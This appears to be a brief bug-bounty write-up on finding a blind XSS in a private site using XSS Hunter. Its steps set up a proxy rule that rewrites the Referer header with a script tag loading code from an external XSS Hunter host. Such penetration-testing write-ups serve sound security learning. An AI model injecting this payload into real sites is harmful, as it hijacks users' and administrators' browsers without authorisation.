Today I want to share with you a Blind XSS which I found in private site.In this write-up I will explain how I found Blind XSS and methodologies.
Blind XSS is a flavor of cross site scripting (XSS), in which the attacker “blindly” publishes a series of malicious payloads on web pages that are
likely to keep them in a constant state (such as in the database or in the log).
Currently I use the XSS hunter (Web version) to find out the Blind XSS.
XSS Hunter is a recently launched platform that makes pen testing for XSS vulnerabilities much easier to monitor and organize. Through it you can launch all kinds of XSS attacks, but where it really shines is when carrying out a Blind XSS attack.
Blind XSS for beginners
I get a lot of DM’s in twitter asking questions about Blind XSS like which tool to use, how to register in XSShunter…
Step 1: To create a new rule, as none of the pre-defined ones does what we need, click “Add”, and you’ll see the new rule dialogue appear. Click the “Type” drop-down and click “Request header”.
Then, add ^Referer.*$ as the “Match” criteria. This string is a regular expression that matches on any header string that starts with Referer. As there should be only one, if any, then a simple match is all we need.
Next, set the “Replace” text as Referer: “><script src=https://newone.xss.ht></script>. Then, check the “Regex match” checkbox, and click “OK”.
When you're testing web applications, sometimes you want to automatically change some part (or parts) of the request…
Step 2: When the response is intercepted, you will see in “Raw” request, that the Referer: “><script src=https://newone.xss.ht></script> has been replaced!, as in the image below.
Step 3: After few hours, when I went back to XSSHunter, it showed that a blind XSS had been executed.